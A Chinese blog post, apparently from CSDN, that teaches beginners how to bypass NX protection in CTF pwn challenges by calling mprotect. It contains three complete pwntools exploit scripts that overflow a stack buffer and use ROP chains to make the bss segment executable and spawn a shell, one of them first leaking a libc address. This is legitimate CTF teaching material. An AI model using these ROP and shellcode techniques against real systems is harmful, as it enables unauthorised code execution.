pwn入门之mprotect函数的利用

已于 2024-01-27 23:29:42 修改
阅读量1.2k 收藏 19
点赞数 18
文章标签: 安全 python linux
于 2024-01-24 22:14:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangxunyu6/article/details/135775289
版权

1:mprotect函数是什么?

它是由rdi  rsi  rdx 三个参数构成(64elf),或者由ebx ecx edx三个参数构成(32elf)。mprotect(addr,length,prot)括号内分别为地址,读入长度,权限。同时也对应着三个参数。

2:mprotect函数的用途。

mprotect()函数可以用来修改一段指定内存区域的保护属性。简单地说就是在一些题目开启NX保护后可以通过这个函数来绕过NX.

3:实例1ctfshow49

查看保护

发现开启NX

ida分析

主函数除了logo只有一个read函数供我们使用v1距离返回地址距离0x16处。思路来了:利用mprotect函数将我们目标读入shellcode处改为可执行的,然后执行shellcode。

详解:找到bss段地址为0x602050,我们将其后三位改成0方便获取更多的空间读入shellcode

即bss=0x602000

通过gadget找到一个含有三个pop一个ret指令的地址,我们要通过这个指令将mprotect函数原来的参数pop走,让我们能够填入我们想要的参数.pop_ebx_esi_ebp_ret=0x80a019b然后就是构造payload了先上代码

from pwn import*
context(arch='i386',os='linux',log_level='debug')
io=process("./49")
elf=ELF('./49')
pop=0x80a019b
bss=0x80DA000
payload=b'a'*22 +p32(elf.sym['mprotect'])+p32(pop) +p32(bss) +p32(0x1000) +p32(7)
payload+=p32(elf.sym['read'])+p32(pop)+p32(0)+p32(bss)+p32(0x1000)+p32(bss)
io.sendline(payload)
shellcode=asm(shellcraft.sh())
pause()
io.sendline(shellcode)
io.interactive()

pay=溢出+返回地址1+参数2+返回地址2+参数2.因为是32位程序先调用函数再传参。

所以payload的意思就是先调用mprotect函数通过pop将原本的参数覆盖为我们想要的参数,然后返回到read函数,然后pop弹掉read的参数,把第二个参数改为bss的地址,读入shellcode。最后再返回到bss段执行shellcode。注:p32(7)在这里意思是改为rwx可读可写可执行的意思

4:实例2

main函数有一个gets函数存在溢出,并且通过为静态编译文件,同时开启NX保护

思路:用mprotect函数将bss段改为rwx,然后往里面读入shellcode即可获取shell.上exp

from pwn import *
p=process("./pwn3")
elf=ELF("./pwn3")
mprotect=0x4353E0
bss=0x6C1C40
rdi=0x00000000004016c3
rsi=0x00000000004017d7
rdx=0x00000000004377d5
read=0x434860
p.recvuntil("where is my system_x64?")
pay=b'a'*(0x50+8)+p64(rdi)+p64(0x6C1000)+p64(rsi)+p64(0x1000)+p64(rdx)+p64(7)+p64(mprotect)+p64(rdi)+p64(0)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x100)+p64(read)+p64(bss)
p.sendline(pay)
pause()
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()

 这题是64位的所以着重讲一下pay的构造。先是溢出操作,然后一个mprotect的相应寄存器一个参数然后调用mprotect函数,接着就是read函数的构造最后返回到bss段执行shellcode

此外,本题还有另外一种解题思路就是因为存在gets函数,以及是静态编译文件可以使用

ROPgadget --binary 文件名  --ropchain让它给你生成一个payload

我们只需要填充垃圾数据就行(这种方法因为简便,目前我很少见类似题目)

5:实例3

ctfshow50

ida分析只有一个gets函数存在溢出距离返回地址40

和上题思路一样,但是ida中不存在mprotect函数,后面的gadget也少了pop_rsi_ret和pop_rdx_ret的指令。所以我们需要先按照libc的思路将libc的基址泄露出来然后计算偏移得到我们需要的函数和pop指令。先上exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p=process("./50")
elf = ELF('./50')
main_addr=0x400637
bss=0x602000
pop=0x4007df
rdi=0x4007e3
p.recvuntil('Hello CTFshow\n')
payload=b'a'*40+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main_addr)
p.sendline(payload)
puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts_addr - libc.symbols['puts']
mprotect = libc_base + libc.symbols['mprotect']
read=libc_base+libc.symbols['read']
rsi=0x000000000002601f+libc_base
rdx=0x0000000000119431+libc_base
p.recvuntil('Hello CTFshow\n')
pay=b'a'*40+p64(rdi)+p64(bss)+p64(rsi)+p64(0x1000)+p64(rdx)+p64(7)*2+p64(mprotect)+p64(rdi)+p64(bss)+p64(elf.plt['gets'])+p64(bss)
pause()
p.sendline(pay)
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()

 因为题目没有相关参数的gadget所以我们查询的是libc文件中的指令,将libc中rsi或rdx的地址加上libc_base就是真实地址。

pay=参数+参数+参数+返回地址1+参数+参数+参数+返回地址2+返回地址3(shellcode处)即64位构造payload先构造参数,再调用函数。

注:这里的rdx是pop_rdx|pop_r12_ret这个和pop_rdx_ret效果一样。所以只需要填充一个p64(7)再随便填充一个数据给r12寄存器,而用pop_rdx|pop_r12_ret不用后者是因为前者适合更多libc版本

6:总结

在本次使用mprotect函数中,主要就是mprotect函数的参数以及payload的构造的理解。

如果以上文章有不足和错误处请通知我,我是菜鸡可能搞错了。

wangxunyu6
关注
  • 18
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mprotect函数测试
10-13 854
mprotect函数测试
Linux中mprotect()函数详解
qq_15762939的博客
01-29 1万+
测试源码 //mmp.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> int *g_ps32Result; void add(int a, int b) { *g_ps32Result = a + b; } void s...
Linux下查看内存使用状况的命令:free -h
JoggingPig的博客
08-19 2027
total:指一共有多少内存; used:正在被使用的内存; free:完全空闲中的内存; shared:共享内存(无实际用处?) buffer/cache:缓存缓冲内存; available:真实可用的内存; cache(内存中的高速缓存)的作用:提高cpu读取数据的速度;(访内存比访问外存花费时间少,划分部分内存作为缓存区,提高性能---高效率的读) buffer(内存中的缓冲区):为了提高写硬盘的速度;(高效率的写) 参考书籍:运维手册 ...
Linux中mprotect()函数的用法
热门推荐
Roland_Sun的专栏
06-23 5万+
mprotect()函数修改在内存映像上的保护模式。 函数原型: #include    #include    int mprotect(const void *start, size_t len, int prot); mprotect把自start开始的内存区的保护模式修改为prot指定的值,如果执行成功返回0,如果执行失败,mprotect返回-1,并且设置errno变量。
浅谈mprotect函数和mmap函数
Rt1Text的博客
06-27 1056
Linux中,mprotect()函数可以用来修改一段指定内存区域的权限。 细说参数一句话mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。注意几点: mmap函数 首先了解内存映射:内存映射:(可以类别数学中函数的映射关系,抽象类比的理解这种关系或者说是过程)将用户空间的一段内存区域映射到内核空间,映射成功后,用户对这段内存区域的修改可以直接反映到内核空间,同样,内核空间对这段区域的修改也直接反映用户空间通俗点理解嘛:就是你和镜子中的你,你发
Linux C/C++内存越界定位: 利用mprotect使程序在crash在第一现场
Life runs on code
04-20 1万+
对于大型Linux C/C++程序,内存越界和野指针类问题往往比较难定位。有的由于内存被非法改写造成了业务功能问题,有的则直接导致了程序crash,而且还经常不是第一现场。针对这种问题,可以采取的解决方法有: 利用valgrind工具来排查,会影响程序性能; 使用Address Sanitizer工具排查; 如果是固定的内存被破坏,可以利用gdb watch来抓取第一现场的调用栈; 可以利用G...
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
warmup pwn入门
02-11
pwn入门
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门PWN的学习,是入门指导。
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
mprotect()函数 Unix/Linux
hellochenlu的博客
05-28 2688
mprotect - 控制允许访问的内存区域 内容简介 #include int mprotect(const void *addr, size_t len, int prot); 描述 The function mprotect() specifies the desired protection for the memory page(s) containing
mprotect,ret2libc
2301_79879963的博客
01-27 760
果然是进入了mprotect函数,再ni就ni不动了,因为我们还没有填入返回地址,接下来再将返回地址修改为bss,但是到这我们只是修改了bss的权限,以及返回到bss并没有获取权限的操作,那么接下来需要再使用。然后来讲讲mprotect函数的使用规则:mprotect(起始地址(要把后三位地址换成000),长度,0-7(取决于你想把目标地址权限改成什么样儿,一般改成7:可读可写可执行))看到gets函数,那么就存在栈溢出了,shift+f12看了一下也是没有后门函数什么的。
linux c之使用mprotect检测内存访问
云守护的专栏
05-30 1万+
Linux中,mprotect()函数可以用来修改一段指定内存区域的保护属性。 函数原型如下: #include   #include   int mprotect(const void *start, size_t len, int prot);  mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 pr
Linux内存mprotect读写,mprotect笔记
weixin_39746382的博客
05-03 731
用户态mprotect的定义int mprotect(const void *addr, size_t len, int prot);其中:addr --- 起始地址len ----addr开始的一块内存的大小prot ---- 期望设置的内存属性,取值是PROT_READ, PROT_WRITE, PROT_EXEC, PROT_NONE 这些bit的组合SYSCALL_DEFINE3(...
Linux内存mprotect读写,linux mprotect 修改用户态内存的方法
weixin_28839549的博客
05-03 1170
一.简述:linux内核有时候需要修改用户态的内存,或者从用户态拷贝数据。由于linux内核态和用户态内存有各自的分区,不能相互直接访问,所以:当用户态态需要访问内核数据时,需要在内核用copy_to_user来吧内核数据拷贝到用户态当内核态需要访问用户态数据时,用copy_from_user来拷贝用户数据到内核。copy_to_user实质就是修改用户态的内存,但有时候需要修改用户态非可写的内存...
linux编程之mprotect
云计算?
11-06 618
mprotect: 设置内存访问权限 mmap 的第三个参数指定对内存区域的保护,由标记读、写、执行权限的 PROT_READ、PROT_WRITE 和 PROT_EXEC 按位与操作获得,或者是限制没有访问权限的 PROT_NONE。如果程序尝试在不允许这些权限的本地内存上操作,它将被 SIGSEGV 信号(Segmentation fault,段错误)终止。 在内存映射完成后,这些...
mprotect排查全局变量内存被篡改问题
最新发布
攀的博客
02-04 990
内存篡改
pwn刷题num34---mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-28 1935
BUUCTF-PWN-not_the_same_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 ida一下 gets函数明显的栈溢出,v4只有0x2D大小,gets函数对输入的字符串没有大小限制 看一下栈区 v4距离返回地址(r所在位置)0x2d个字节 找
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值